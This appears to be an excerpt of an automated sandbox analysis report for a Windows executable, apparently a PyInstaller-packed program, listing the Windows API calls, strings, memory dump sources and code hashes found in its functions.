                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                        • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction ID: de1c0c34d6da0715a4bcb1b2921f45018cb3cf7e8dcddede7531b57ba40bec31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7212F25B0CA8242EB10AB55A45423AE3A1FBC57F4F900235EA7D43AE4DFECD845C791

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7F24F3534), ref: 00007FF7F24F3411
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: GetLastError.KERNEL32(?,?,?,00007FF7F24F342E,?,00007FF7F24F3534), ref: 00007FF7F24F2A14
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7F24F342E), ref: 00007FF7F24F2A7D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: MessageBoxW.USER32 ref: 00007FF7F24F2ACF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                        • API String ID: 517058245-2863816727
                                                                                                                                                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction ID: 324d46c5197e621f43712a0d9c02314df2b84dde057860ffdb56dd83e582fb46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2219261B0858291FB21FB24E8513B9A250BFD9795FC00236DA7D8B5D5EFECE904C7A0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7F24F7B70
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7F24F7B83
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetTokenInformation.KERNELBASE ref: 00007FF7F24F7BA8
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetLastError.KERNEL32 ref: 00007FF7F24F7BB2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetTokenInformation.KERNELBASE ref: 00007FF7F24F7BF2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F24F7C0E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: CloseHandle.KERNEL32 ref: 00007FF7F24F7C26
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF7F24F3814), ref: 00007FF7F24F848C
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF7F24F3814), ref: 00007FF7F24F8495
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                        • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction ID: 24e8720c93eb1a495042645fc9b3b5140fe9d922792fe64b4721c76fee443a01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64213E21A0864292E710BB50E8252FAB2A0FBC9790FC44035EA6D477D6DFBCD845C7E0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F250C25B), ref: 00007FF7F250C38C
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F250C25B), ref: 00007FF7F250C417
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                        • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction ID: ce90c4b08edfb1cf2bf03780603cb0c014652f729ebf87a391f1599b62d4f169
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B791F6B2B1965385F750EF6598802BDA7A0BF05B89F940175DE2E53AC4EFBCD441C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                        • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction ID: 673c3b7304796adb5fd15c45b5a0e0803624c59776cc632b4693156f7cff0b9d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70419422D1878243E754EF619910379B261FB94764F509374EAAC03AD5EFBCA5E0C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                        • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction ID: 5a421d28e946ae8ae5e57d1099e61fbeee3e80c50292e55346a30779e65c9d3b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90313A11E0E14345FB14FB64E4267B9A2819F95384FC45075E93E4BAD3DEECAC05C6B1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                        • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction ID: beca6f3b0157d2622f605144f8a7f5e6cc2f4c8934adc3afcaa21493d250863b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76D09E11F28A0787EB587F705C6D97992115F5C711F9426B8D86B0B3E3EEACA81DC2E0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction ID: 8168b787d564d7f34d58842c04def89b53a1d686124115137c9bfa2d16a5a0f4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6951E462B0924247FB28AE25940067AA291FFC4FB4F954634DE7C037D6CEFCE841C6A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction ID: 0a212edcdb5b3041d84eaeb2e5929996f012bff01a30fbc0ecb09c4d36293494
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5311BF61B18A8281DB10EF25A894169A362EB54BF4F940371EE7E077E9DFBCD150C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                        • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction ID: 99835e6f696974423de1e4a5d7c09285b1c6f5b30d5717ddddc85c0c71f73634
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAE04F20F1864783FB08BFB168551B992916F98B00B8060B0D92D432D1EEAC6885C2A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7F2509CE5,?,?,00000000,00007FF7F2509D9A), ref: 00007FF7F2509ED6
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F2509CE5,?,?,00000000,00007FF7F2509D9A), ref: 00007FF7F2509EE0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction ID: 98ac0ba4ef59fc586583e773a3308b33ca55179a54c36713d12ead1e7fefb58a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A521C211F1C64301EB50FF65AD903BD92925F84BA0F8412B5DA3E472D5EEECA881C3A1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction ID: 03be6937b4bc48115b1b83a3f51f0f29ccd78b31581a51fec72edad900beeed7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1841B63291820347EB24EF15A99117DB3A0EB56B50F940171D6AE836D1DFBDF502C7B1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                        • Opcode ID: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                                                                                                                                                        • Instruction ID: 81d7b4a3af10417501aa437cf264c3684d8cf9377d3853c5aca670caa0fd48ab
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD21A525B18A5246FB10BA1669043BAE691BF85BD4FC84430DD3C077C6DEFDF841C295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction ID: 26defe596c51bf36e963075a0354482e34ce50306038815c977f67a63b36ff00
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C316F32A2864386E711FF559C413BDA650AB50B61F9101B5EA3D4B3D2EFFCA481C7B1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction ID: 081db42f4627dccf1dcac8a50edd1f058ea2e01dfeb2b7bcc95d66e4399bf3a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21A132A167068AEB24EF64C8446FC73B0FB04718F84067AD62C0BAC5EFB8D444C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction ID: 9e2b18854bf28a96c62477fcd7c2ad716f3b6cd392b99b04f2a3d36f15868dcb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118421A1D64342EB61FF519C0127EE264BF55B80FC44471EA5C576D6EFBCD840C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction ID: 94a74c21071dbc57a8116318edf7850ffe03753d0db7a5d0943d60e0024df2a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5621C93271868287DB61EF28D481379B6A1FB84BA4F944234D76D476E9DF7CD400CB50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction ID: 2c4f5c3ebd4767b8cfca0f8f39c5b4cb55f4965c12cb0ba37650ac93150063a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9018221A08B4242EB04FF565901079E6E5EF95FE0B894675DE7C13BD6DEBCE402C350
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
